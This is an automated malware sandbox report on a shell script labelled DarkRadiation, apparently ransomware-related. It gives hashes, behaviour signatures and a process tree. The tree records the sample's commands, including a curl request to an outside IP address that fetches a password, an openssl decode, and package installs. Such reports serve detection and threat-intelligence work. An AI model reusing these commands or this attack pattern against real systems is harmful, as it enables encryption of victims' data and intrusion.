Overview

overview

10

Static

static

10

30c9166a9f...c55.sh

ubuntu-18.04-amd64

7

30c9166a9f...c55.sh

debian-9-armhf

7

30c9166a9f...c55.sh

debian-9-mips

7

30c9166a9f...c55.sh

debian-9-mipsel

7

3d93d26bca...b06.sh

ubuntu-18.04-amd64

3

3d93d26bca...b06.sh

debian-9-armhf

3

3d93d26bca...b06.sh

debian-9-mips

3

3d93d26bca...b06.sh

debian-9-mipsel

3

31.214.157...tor.sh

windows7-x64

3

31.214.157...tor.sh

windows10-2004-x64

3

31.214.157...tor.sh

windows7-x64

3

31.214.157...tor.sh

windows10-2004-x64

3

31.214.157...or1.sh

windows7-x64

3

31.214.157...or1.sh

windows10-2004-x64

3

31.214.157...ode.sh

windows7-x64

3

31.214.157...ode.sh

windows10-2004-x64

3

31.214.157...de1.sh

windows7-x64

3

31.214.157...de1.sh

windows10-2004-x64

3

31.214.157...rst.sh

ubuntu-18.04-amd64

7

31.214.157...rst.sh

debian-9-armhf

7

31.214.157...rst.sh

debian-9-mips

7

31.214.157...rst.sh

debian-9-mipsel

7

31.214.157...ond.sh

ubuntu-18.04-amd64

7

31.214.157...ond.sh

debian-9-armhf

7

31.214.157...ond.sh

debian-9-mips

7

31.214.157...ond.sh

debian-9-mipsel

7

31.214.157...pt3.sh

windows7-x64

3

31.214.157...pt3.sh

windows10-2004-x64

3

31.214.157...ile.sh

ubuntu-18.04-amd64

7

31.214.157...ile.sh

debian-9-armhf

7

31.214.157...ile.sh

debian-9-mips

7

31.214.157...ile.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    149s
  • max time network
    71s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    14-10-2024 14:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh

  • Size

    17KB

  • MD5

    35dbc971ba859fb80c291d811154b112

  • SHA1

    1168e6f49632123d6df8c0f91291512ed82f6b1e

  • SHA256

    719e0120cf1e5c0dd80e8e88d9c0c621f8b6f0fd03f7c10758eb453006aecf1f

  • SHA512

    a82d86d8c74ad034f1530c83cfe13c13f1f5bae63f31fcc26d08b632da1a02e4eb64ac7ba609a119d25d6c129ef98741417b1accb482c641ade09602810e2277

  • SSDEEP

    384:wydspDw5wi6xc696x04vo0Os6T4vo0OltRK:wEspEmLxRMx0vhTvbA

Score
7/10
defense_evasiondiscoveryexecution

Malware Config

Signatures

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

    defense_evasion
  • Reads runtime system information 7 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 9 IoCs

    Malware often drops required files in the /tmp directory.

  • Software Deployment Tools 1 TTPs 2 IoCs

    Use software deployment tools to execute code.

    execution

Processes

  • /tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
    "/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh"
    1⤵
    • Writes file to tmp directory
    PID:738
    • /usr/bin/curl
      curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"
      2⤵
      • Reads runtime system information
      PID:740
    • /usr/bin/openssl
      openssl enc -base64 -aes-256-cbc -d -pass pass:
      2⤵
      • Deobfuscate/Decode Files or Information
      PID:825
    • /usr/bin/apt-get
      apt-get install curl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:826
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:827
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:828
    • /usr/bin/apt-get
      apt-get install wget --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:829
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:830
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:831

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • /tmp/sh-thd.CEF1HN
    Filesize

    1B

    MD5

    68b329da9893e34099c7d8ad5cb9c940

    SHA1

    adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

    SHA256

    01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

    SHA512

    be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

    Download Submit